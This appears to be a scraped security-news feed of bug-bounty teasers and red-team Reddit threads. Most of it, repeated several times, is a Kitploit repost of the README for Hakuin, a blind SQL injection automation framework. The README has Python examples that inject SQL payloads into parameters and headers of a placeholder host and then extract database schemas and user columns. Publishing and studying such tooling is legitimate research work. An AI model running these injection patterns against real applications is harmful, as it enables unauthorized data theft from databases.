Broken Access Control (IDOR) & Credential Leak at Legacy API Video Transcode
https://medium.com/@blackarazi/broken-access-control-idor-credential-leak-at-legacy-api-video-transcode-9b5d729fb2d6?source=rss------bug_bounty-5
https://medium.com/@blackarazi/broken-access-control-idor-credential-leak-at-legacy-api-video-transcode-9b5d729fb2d6?source=rss------bug_bounty-5
Hello everyone,Continue reading on Medium » (https://medium.com/@blackarazi/broken-access-control-idor-credential-leak-at-legacy-api-video-transcode-9b5d729fb2d6?source=rss------bug_bounty-5)
Broken Access Control (IDOR) & Credential Leak at Legacy API Video Transcode
Hello everyone,Continue reading on Medium »
Read more...
Hello everyone,Continue reading on Medium »
Read more...
Medium
Broken Access Control (IDOR) & Credential Leak at Legacy API Video Transcode
In this post, I will show you how I discovered a broken authentication and authorization vulnerability, known as IDOR.
Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework
http://www.kitploit.com/2024/05/hakuin-blazing-fast-blind-sql-injection.html
http://www.kitploit.com/2024/05/hakuin-blazing-fast-blind-sql-injection.html
Hakuin is a Blind SQL Injection (https://www.kitploit.com/search/label/Injection) (BSQLI) optimization and automation (https://www.kitploit.com/search/label/Automation) framework (https://www.kitploit.com/search/label/Framework) written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable (https://www.kitploit.com/search/label/Vulnerable) web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more. Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh (https://blackhatmea.com/session/hakuin-injecting-brain-blind-sql-injection), 2023 - Hack in the Box, Phuket (https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/), 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT) (https://wootconference.org/papers/woot23-paper17.pdf), 2023 More information can be found in our paper (https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) and slides (https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).
Installation To install Hakuin, simply run: pip3 install hakuin
Developers should install the package locally and set the -e flag for editable mode: git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Examples Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False. Example 1 - Query Parameter Injection with Status-based Inference import aiohttp
from hakuin import Requester
class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
Example 2 - Header Injection with Content-based Inference class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()
To start extracting data, use the Extractor (https://www.kitploit.com/search/label/Extractor) class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py. Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL
class StatusRequester(Requester):
...
async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())
Now that eveything is set, you can start extracting DB metadata. Example 1 - Extracting DB Schemas # strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together metadata = await ext.extract_meta(strategy='model')
Installation To install Hakuin, simply run: pip3 install hakuin
Developers should install the package locally and set the -e flag for editable mode: git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Examples Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False. Example 1 - Query Parameter Injection with Status-based Inference import aiohttp
from hakuin import Requester
class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
Example 2 - Header Injection with Content-based Inference class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()
To start extracting data, use the Extractor (https://www.kitploit.com/search/label/Extractor) class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py. Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL
class StatusRequester(Requester):
...
async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())
Now that eveything is set, you can start extracting DB metadata. Example 1 - Extracting DB Schemas # strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together metadata = await ext.extract_meta(strategy='model')
Once you know the structure, you can extract the actual content. Example 1 - Extracting Generic Columns # text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns # strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns res = await ext.extract_column_blob(table='users', column='id')
More examples can be found in the tests directory. Using Hakuin from the Command Line Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run: python3 hk.py -h
For Researchers This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version (https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results. Cite Hakuin @inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
Download Hakuin (https://github.com/pruzko/hakuin)
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns # strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns res = await ext.extract_column_blob(table='users', column='id')
More examples can be found in the tests directory. Using Hakuin from the Command Line Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run: python3 hk.py -h
For Researchers This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version (https://zenodo.org/record/7804243) as it contains the original code, experiment scripts, and an instruction manual for reproducing the results. Cite Hakuin @inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
Download Hakuin (https://github.com/pruzko/hakuin)
What is your biggest credential dump you ever done in AD environment? How long does it take to get all of them? Was there any impact to the network?
https://www.reddit.com/r/redteamsec/comments/1csa0wi/what_is_your_biggest_credential_dump_you_ever/
submitted by /u/w0lfcat (https://www.reddit.com/user/w0lfcat)
[link] (https://www.reddit.com/r/redteamsec/) [comments] (https://www.reddit.com/r/redteamsec/comments/1csa0wi/what_is_your_biggest_credential_dump_you_ever/)
https://www.reddit.com/r/redteamsec/comments/1csa0wi/what_is_your_biggest_credential_dump_you_ever/
submitted by /u/w0lfcat (https://www.reddit.com/user/w0lfcat)
[link] (https://www.reddit.com/r/redteamsec/) [comments] (https://www.reddit.com/r/redteamsec/comments/1csa0wi/what_is_your_biggest_credential_dump_you_ever/)
CVE-2024–4761: Exploiting Chrome’s JavaScript Engine Highly Exploited (PoC presented)
Discover the technical breakdown of CVE-2024–4761, an out-of-bounds write vulnerability in Chrome’s V8 JavaScript engine, its impact…Continue reading on InfoSec Write-ups »
Read more...
Discover the technical breakdown of CVE-2024–4761, an out-of-bounds write vulnerability in Chrome’s V8 JavaScript engine, its impact…Continue reading on InfoSec Write-ups »
Read more...
Medium
CVE-2024–4761: Exploiting Chrome’s JavaScript Engine Highly Exploited (PoC presented)
Discover the technical breakdown of CVE-2024–4761, an out-of-bounds write vulnerability in Chrome’s V8 JavaScript engine, its impact…
CVE-2024–4761: Exploiting Chrome’s JavaScript Engine Highly Exploited (PoC presented)
https://infosecwriteups.com/cve-2024-4761-exploiting-chromes-javascript-engine-highly-exploited-poc-presented-dcf9cab95c00?source=rss------bug_bounty-5
https://infosecwriteups.com/cve-2024-4761-exploiting-chromes-javascript-engine-highly-exploited-poc-presented-dcf9cab95c00?source=rss------bug_bounty-5
Discover the technical breakdown of CVE-2024–4761, an out-of-bounds write vulnerability in Chrome’s V8 JavaScript engine, its impact…Continue reading on InfoSec Write-ups » (https://infosecwriteups.com/cve-2024-4761-exploiting-chromes-javascript-engine-highly-exploited-poc-presented-dcf9cab95c00?source=rss------bug_bounty-5)
How I Got My First Bounty: The Exciting Story of My Bug Bounty Breakthrough
https://infosecwriteups.com/how-i-got-my-first-bounty-the-exciting-story-of-my-bug-bounty-breakthrough-d8391973ed41?source=rss------bug_bounty-5
https://infosecwriteups.com/how-i-got-my-first-bounty-the-exciting-story-of-my-bug-bounty-breakthrough-d8391973ed41?source=rss------bug_bounty-5
Long time no see! I’ve been a bit preoccupied with other tasks besides bug bounty hunting, so I haven’t had the chance to post any blogs…Continue reading on InfoSec Write-ups » (https://infosecwriteups.com/how-i-got-my-first-bounty-the-exciting-story-of-my-bug-bounty-breakthrough-d8391973ed41?source=rss------bug_bounty-5)
How I Got My First Bounty: The Exciting Story of My Bug Bounty Breakthrough
Long time no see! I’ve been a bit preoccupied with other tasks besides bug bounty hunting, so I haven’t had the chance to post any blogs…Continue reading on InfoSec Write-ups »
Read more...
Long time no see! I’ve been a bit preoccupied with other tasks besides bug bounty hunting, so I haven’t had the chance to post any blogs…Continue reading on InfoSec Write-ups »
Read more...
Medium
How I Got My First Bounty: The Exciting Story of My Bug Bounty Breakthrough
Long time no see! I’ve been a bit preoccupied with other tasks besides bug bounty hunting, so I haven’t had the chance to post any blogs…
21.4 Lab: OAuth account hijacking via redirect\_uri | 2024
This lab uses an OAuth service to allow users to log in with their social media account. A misconfiguration by the OAuth provider makes it…Continue reading on Medium »
Read more...
This lab uses an OAuth service to allow users to log in with their social media account. A misconfiguration by the OAuth provider makes it…Continue reading on Medium »
Read more...
Medium
21.4 Lab: OAuth account hijacking via redirect_uri | 2024
This lab uses an OAuth service to allow users to log in with their social media account. A misconfiguration by the OAuth provider makes it…
Red Teamer path advice
https://www.reddit.com/r/redteamsec/comments/1cshdlg/red_teamer_path_advice/
<!-- SC_OFF -->Hi guys ! I'm actually trying a reconversion from Deep learning dev/PM to cyber security (1y as dev and 3y as technical PM). I have 2 jobs I would like to reach, threat hunter and red teamer. The thing is that I actually hate pentesting, what I prefere in red teaming is malware development, command and control, pivoting and other post exploitation stuff. So my questions are : can I become red teamer without going for pentesting job first ? Is reaching threath hunter then pivoting to red teaming doable ? What is the best strategy ? Thank a lot for your help and sorry for my english its not my mother language. <!-- SC_ON --> submitted by /u/Hungry-Loquat1326 (https://www.reddit.com/user/Hungry-Loquat1326)
[link] (https://www.reddit.com/) [comments] (https://www.reddit.com/r/redteamsec/comments/1cshdlg/red_teamer_path_advice/)
https://www.reddit.com/r/redteamsec/comments/1cshdlg/red_teamer_path_advice/
<!-- SC_OFF -->Hi guys ! I'm actually trying a reconversion from Deep learning dev/PM to cyber security (1y as dev and 3y as technical PM). I have 2 jobs I would like to reach, threat hunter and red teamer. The thing is that I actually hate pentesting, what I prefere in red teaming is malware development, command and control, pivoting and other post exploitation stuff. So my questions are : can I become red teamer without going for pentesting job first ? Is reaching threath hunter then pivoting to red teaming doable ? What is the best strategy ? Thank a lot for your help and sorry for my english its not my mother language. <!-- SC_ON --> submitted by /u/Hungry-Loquat1326 (https://www.reddit.com/user/Hungry-Loquat1326)
[link] (https://www.reddit.com/) [comments] (https://www.reddit.com/r/redteamsec/comments/1cshdlg/red_teamer_path_advice/)
How I Was Able to Perform a Subdomain Takeover Attack
Hey Hackers,Continue reading on Medium »
Read more...
Hey Hackers,Continue reading on Medium »
Read more...
Medium
How I Was Able to Perform a Subdomain Takeover Attack
Hey Hackers,
Subdomain Takeover: What is It? How to Exploit? How to Find Them?
In this article, we shed light on Subdomain Takeovers and discuss 3 things:Continue reading on Medium »
Read more...
In this article, we shed light on Subdomain Takeovers and discuss 3 things:Continue reading on Medium »
Read more...
Medium
Subdomain Takeover: What is It? How to Exploit? How to Find Them?
In this article, we shed light on Subdomain Takeovers and discuss 3 things: